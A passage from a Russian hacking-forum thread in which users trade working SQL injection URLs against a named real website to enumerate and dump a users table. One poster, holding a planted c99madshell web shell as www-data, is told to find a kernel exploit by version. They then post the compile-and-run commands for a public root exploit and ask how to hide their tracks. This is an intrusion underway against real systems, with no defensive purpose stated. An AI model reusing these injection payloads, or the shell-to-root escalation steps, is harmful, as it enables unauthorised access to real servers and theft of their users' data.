ANTICHAT — форум по информационной безопасности, OSINT и технологиям

нашел название таблицы. а при подставновкке выдаёт ошибку.
нашел вот так http://www.suas.ru/news/show.php?id=-1+union+select+1,table_name,3,4,5,table_schema,7,8 ,9,10+from+information_schema.tables+limit+41,1/*

подставил сюда http://www.suas.ru/news/show.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+ru_suas_r eg_users/* и ошибка =\

В этой таблице нет ни одной записи просто, пустая она:

http://www.suas.ru/news/show.php?id=-1+union+select+1,2,3,4,5,count(1),7,8,9,10%20from% 20ru_suas_reg_users/*

дело совсем в другом, а именно в самих правах доступа drw-r--r- к примеру..

есть статья в нашизх статьях, ищи.

__________________

Велемир, там надо лимитом пользоваться:

__________________
Карфаген должен быть разрушен...

Спасибо, blackybr!

Подскажите, как можно и через что получить в Linux доступ к файлам root/adm, которые открыты только для этого пользователя и закрыты для группы, если есть c99madshell с правами uid=33(www-data) gid=33(www-data) groups=33(www-data) ?

Спасибо!

fervex поднять права, к примеру порутать серв. от рута ты сам сможешь права ставить любые

__________________

Спасибо, blackybr!
а порутать серв можно с помощью сплойта или ещё как?
посоветуйте, что почитать можно по рутанью Linux сервера, если залит c99madshell?

выполняешь uname -a , смотришь версию ядра и ищешь сплоиты под эту версию

Спасибо, Анжелик!
Linux webserver2 2.6.15-26-server #1 SMP Aug 2006 i686 GNU/Linux
Версию знаю, сплоит нашёл - http://www.milw0rm.com/exploits/2006

А если я его выполню в c99madshell через: gcc raptor_prctl.c -o raptor_prctl -Wall
./raptor_prctl

то какой будет результат в итоге? у меня у c99madshell'a появятся права root на эту сессию, или навсегда? или ещё что? не запалит ли это меня, и как замести следы?